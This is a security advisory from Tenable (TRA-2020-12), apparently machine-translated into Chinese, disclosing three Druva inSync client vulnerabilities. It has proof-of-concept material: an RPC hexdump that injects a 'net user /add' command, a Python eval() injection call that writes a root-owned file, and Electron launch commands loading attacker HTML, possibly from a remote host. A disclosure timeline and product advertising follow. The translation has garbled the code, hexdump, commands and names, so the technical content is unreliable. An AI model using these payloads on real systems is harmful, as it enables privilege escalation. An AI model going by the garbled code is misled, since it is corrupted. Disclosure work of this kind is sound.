脸谱网 Google + 推特 LinkedIn YouTube RSS 菜单 搜索 资源——博客 资源-网络研讨会 资源-报告 资源-事件 icons_066 icons_067 icons_068 icons_069 icons_070

Druva inSync系统客户端多个漏洞

剧情简介

cve - 2019 - 3999: Druva inSyncCPHwnet64 inSync系统客户端。exe RPC请求类型5未经身份验证的操作系统命令注入——当地特权升级(Windows)

Windows Druva inSync系统客户服务(inSyncCPHwnet64.exe)包含一个命令注入漏洞,可以利用当地的未经身份验证的攻击者与系统权限执行操作系统命令。

当处理RPC类型5请求通过TCP端口6064,inSyncCPHwnet64。exe不正确验证请求数据传递到CreateProcessW之前()函数。通过发送一个精心制作的RPC请求,攻击者可以提升系统权限。

概念验证

看到github

下面是一个hexdump的请求发送到利用此漏洞,执行命令“网络用户/添加站得住脚的”

63 69 6 e 53 79 6 e 00000000 20 50 48 43 20 52 50 43 57 5 b inSync系统P HC RPCW [00000010 76 30 30 30 32 5 d v0002] 00000016 05 00 00 00 ....0000001 2 00 00 00 *……65 e 6 e 00 0000001 74 00 00 00 75 73 00 00 65 72 00 00 n.e.t。。u.s.e.r。0000002 e 20 00 2 f 00 61 00 64 64 00 65 74 00 00 00 00。/ .a.d。d。.t.e。0000003 e 6 e 00 61 62 00 00 6 c 65 00 00 n.a.b.l. e。

这是在inSyncCPH相应的日志条目。日志显示成功的开发尝试。注意,命令执行网络用户/添加站得住脚的。

20/12/2019 11:17:38:sysstate请求创建一个过程。转换:21日cmd:网络用户/添加站得住脚的20/12/2019 11:17:38:退出代码sysstate过程是0,返回值是1

cve - 2019 - 4000: Druva inSync系统客户端inSyncDecommission守护进程。set_file_acl验证Python代码注入(Mac OS)

inSyncDecommission过程容易Python代码注入通过RPC服务可以通过TCP端口6059。具体来说,守护进程。set_file_acl Python方法将用户输入传递给eval()函数。这个漏洞可以利用当地的,验证攻击者使用root特权执行任意Python代码。

反编译daemon_set_file_acl函数后,我们相信函数源代码如下。注意到acl参数传递给eval()没有验证:

def daemon_set_file_acl(未知、帧,acl、user_uid user_gid):试题:(模式、uid、gid) = eval (acl) #不安全调用eval()如果不是stat.S_ISLNK(模式):操作系统。chmod(帧模式)如果uid:操作系统。lchown(帧、user_uid user_gid)其他:操作系统。lchown(帧、uid、gid)除了异常故障:SyncLog。错误(“不能设置acl文件% s,错误:% s的,帧,str(断层))SyncLog.dtraceback(断层)提高返回None

概念验证

看到github

这是一个示例PoC的调用。注意ROOT_OWNED成立,它是由根。

史酷比$ ls - l /私人总0史酷比python insync_rpc_set_acl_auth_exploit美元/ tmp。py 7 u0ipcrhaudqbchfptnx”操作系统。系统(“触摸/ tmp / ROOT_OWNED”)“史酷比$ ls - l /私人/ tmp总0 -rw-r - r - 1根轮0 12月27日11:15 ROOT_OWNED

cve - 2019 - 4001:电子应用程序命令行参数错误配置

inSync系统电子应用程序中配置这样一个恶意的本地用户的上下文中可以执行任意代码NodeJS inSync系统客户端过程。攻击者可以做到这一点,推出inSync系统与一个URL参数指向一个包含NodeJS attacker-controlled HTML文件的代码。

请注意,这个文件也可以指向一个远程位置(例如,http://12.34.56.78/index.html)。

注意,这个漏洞也可以用于读取服务令牌从MacOS钥匙扣,随后,它可能被利用结合cve - 2019 - 4000升级特权根。

下面我贴main.js脆弱的代码片段。注意,命令行参数的值分配给inSyncURL没有任何验证。这使得电子应用程序来执行任何指定的文件中。

如果(os.platform() = =“达尔文”){如果(过程。argv [3] = =“no_rfs”) {/ / TODO发射如果没有参数inSyncURL =过程。argv [1] windowType =过程。argv [2]}else { inSyncURL = process.argv[2] windowType = process.argv[3] } } else { if(process.argv[1] == null) { var child = spawn(path.join(__dirname, '..', '..', '..', '..', 'inSyncAgent.exe'), ['configure'], {detached: true}); app.quit() return } inSyncURL= process.argv[1] windowType = process.argv[2] }
概念验证
(Mac OS)打开/应用程序/ Druva \ inSync.app /内容/资源/ inSync系统。应用程序——args”文件:/ / /用户/ myuser /索引。html“主要no_rfs (Windows)“C: \程序文件(x86)电子\ Druva \ inSync系统\ \ inSyncClient \ inSync系统。exe”文件:/ / C: /用户/ myuser /索引。html主要no_rfs

解决方案

Druva inSync系统版本6.6.0修复cve - 2019 - 3999和cve - 2019 - 4000,和版本6.6.2修复cve - 2019 - 4001。

披露时间表

12/26/2019——站得住脚的联系人(电子邮件保护)澄清适当披露漏洞的方法。要求PGP的关键。
12/26/2019——Druva CISO(汤姆·康克林)通过LinkedIn消息响应,他今天将发送PGP关键。
12/26/2019——Druva发送PGP的关键。
12/27/2019——站得住脚的发送漏洞细节和PoC的03/26/2020 Druva。90天的日期。
12/27/2019——Druva证实收到报告。分配的票。
01/02/2020——站得住脚的ack。
01/07/2020——关于Windows vuln Druva要求澄清。
01/07/2020——站得住脚的提供澄清。
01/21/2020——站得住脚的要求更新。
01/21/2020——Druva正在修复并行和确认测试。他们将更新我们。
01/22/2020 - Druva表明他们有固定的问题1,但是仍在努力解决。
01/22/2020——站得住脚的要求澄清。重申我们的漏洞信息披露政策。
01/22/2020——Druva尚未公布。暂定2月发布。
01/23/2020——站得住脚的承认。谢谢你的澄清。
02/06/2020——站得住脚的要求更新。
02/07/2020 - Druva的回应:“问候........... ! ! ! ! ! !我们将让你知道关于补丁发布,我们的团队正在优先。”
02/07/2020——站得住脚的要求更具体的修复时间。以前的响应不加强01/22/2020 Druva的声明。
02/07/2020——Druva重申2月发布。暂时本月第三周中期根据最终的测试结果。
02/11/2020——站得住脚的感谢Druva更新。
02/14/2020——Druva说他们将发布一个新客户在周末(2 3错误纠正)。他们有固定的一切但电子应用程序错误配置,但他们计划在时间轴修复它。
02/18/2020——站得住脚的感谢Druva更新。
02/25/2020——站得住脚的通知Druva我们研究的咨询交易- 2020 - 12所示。
02/25/2020——Druva感谢站得住脚的更新。
03/19/2020——站得住脚的要求更新。问他们将能够使3月26日时间表。
03/19/2020——Druva说“是的”,他们正在完成测试。
03/24/2020——Druva 6.6.2固定电子缺陷通知站得住脚的版本。

交易报告内的所有信息提供了“是”,没有任何形式的保证,包括适销性的隐含保证和健身为特定目的,并没有保证的完整性、准确性、及时性。个人和组织负责评估任何实际或潜在的安全漏洞的影响。

站得住脚的非常重视产品安全。如果你认为你已经找到一个漏洞在一个我们的产品,我们要求您请与我们共同努力,快速解决它为了保护客户。站得住脚的相信迅速应对这样的报道,与研究人员保持沟通,并提供解决方案。

提交漏洞信息的更多细节,请参阅我们的漏洞报告指南页面。

如果你有问题或修正咨询,请电子邮件(电子邮件保护)

风险信息

成立咨询ID
交易- 2020 - 12所示
信贷

克里斯•莱恩

CVSSv2基地/时间的分数
7.2/6.0
CVSSv2向量
(AV: L /交流:L /非盟:N / C: C / I: C / A: C)
受影响的产品
Druva inSync系统客户端6.5.0
风险因素

咨询时间

02/25/2020——咨询发布的
03/24/2020 -更新cve - 2019 - 4001

站得住脚的脆弱性管理

以前Tenable.io


享受完全访问一个现代的、基于云的脆弱性管理平台,使您能够看到并追踪你所有的资产与无与伦比的精度。

你站得住脚的脆弱性管理试验Lumin还包括成立,成立网络应用扫描和站得住脚的云安全。

站得住脚的脆弱性管理

以前Tenable.io

享受完全访问一个现代的、基于云的脆弱性管理平台,使您能够看到并追踪你所有的资产与无与伦比的精度。今天购买你的年度订阅。

65年资产

选择你的订阅选项:

现在购买

尝试成立Nessus专业免费的

免费7天

站得住脚的Nessus是当今市场上最全面的漏洞扫描器。

新成立Nessus专家
现在可用

Nessus专家增添了更多的功能,包括外部攻击表面扫描,和添加域和扫描云基础设施的能力。点击这里尝试Nessus专家。

填写下面的表格继续Nessus Pro的审判。

买站得住脚的Nessus专业

站得住脚的Nessus是当今市场上最全面的漏洞扫描器。站得住脚的Nessus专业将帮助自动化漏洞扫描过程,节省时间在你的合规周期,让你与你的团队。

买一个多年的许可并保存。高级支持访问添加到手机、社区和聊天支持一天24小时,一年365天。

选择您的许可

买一个多年的许可并保存。

添加的支持和培训

Tenable.io

享受完全访问一个现代的、基于云的脆弱性管理平台,使您能够看到并追踪你所有的资产与无与伦比的精度。

你站得住脚的脆弱性管理试验Lumin还包括成立,成立网络应用扫描和站得住脚的云安全。

Tenable.io

享受完全访问一个现代的、基于云的脆弱性管理平台,使您能够看到并追踪你所有的资产与无与伦比的精度。今天购买你的年度订阅。

65年资产

选择你的订阅选项:

现在购买

尝试站得住脚的Web应用程序扫描

以前Tenable.ioWeb Application Scanning

享受完全访问我们的最新的web应用程序扫描提供专为现代应用程序的一部分的一个管理平台。安全扫描整个在线组合漏洞具有高精确度没有重体力工作或中断关键web应用程序。现在报名。

你站得住脚的Web应用程序扫描试验还包括站得住脚的脆弱性管理,成立Lumin站得住脚的云安全。

买站得住脚的Web应用程序扫描

以前Tenable.ioWeb Application Scanning

享受完全访问一个现代的、基于云的脆弱性管理平台,使您能够看到并追踪你所有的资产与无与伦比的精度。今天购买你的年度订阅。

5 fqdn

3578美元

现在购买

尝试成立Lumin

可视化和探索你的风险管理,跟踪风险降低随着时间的推移和基准与站得住脚的Lumin你的同行。

你站得住脚的Lumin审判还包括站得住脚的脆弱性管理,站得住脚的Web应用程序扫描和站得住脚的云安全。

买站得住脚的Lumin

联系销售代表如何站得住脚的Lumin可以帮助你了解你的整个组织和管理网络的风险。

尝试站得住脚的云安全

以前Tenable.cs

享受完全访问检测和修复云基础设施配置错误和查看运行时的漏洞。现在注册你的免费试用。了解更多关于审判过程请点击这里。

你站得住脚的云安全试验还包括站得住脚的脆弱性管理,成立Lumin和站得住脚的Web应用程序扫描。

联系销售代表购买站得住脚的云安全

联系销售代表来了解更多关于站得住脚的云安全,看是多么容易机载云账户和获得可见性都几分钟内云配置错误和漏洞。

尝试成立Nessus专家免费

免费7天

现代修建的攻击表面,Nessus专家使您能够看到更多和保护您的组织从漏洞从云。

已经成立Nessus专业吗?
升级到Nessus专家免费7天。

买站得住脚的Nessus专家

现代修建的攻击表面,Nessus专家使您能够看到更多和保护您的组织从漏洞从云。

选择您的许可

买一个多年的执照和存更多的钱。

添加的支持和培训

尝试Nessus专家免费

免费7天

现代修建的攻击表面,Nessus专家使您能够看到更多和保护您的组织从漏洞从云。

已经有了Nessus专业?
升级到Nessus专家免费7天。

买站得住脚的Nessus专家

现代修建的攻击表面,Nessus专家使您能够看到更多和保护您的组织从漏洞从云。

选择您的许可

买一个多年的执照和存更多的钱。

添加的支持和培训

Baidu
map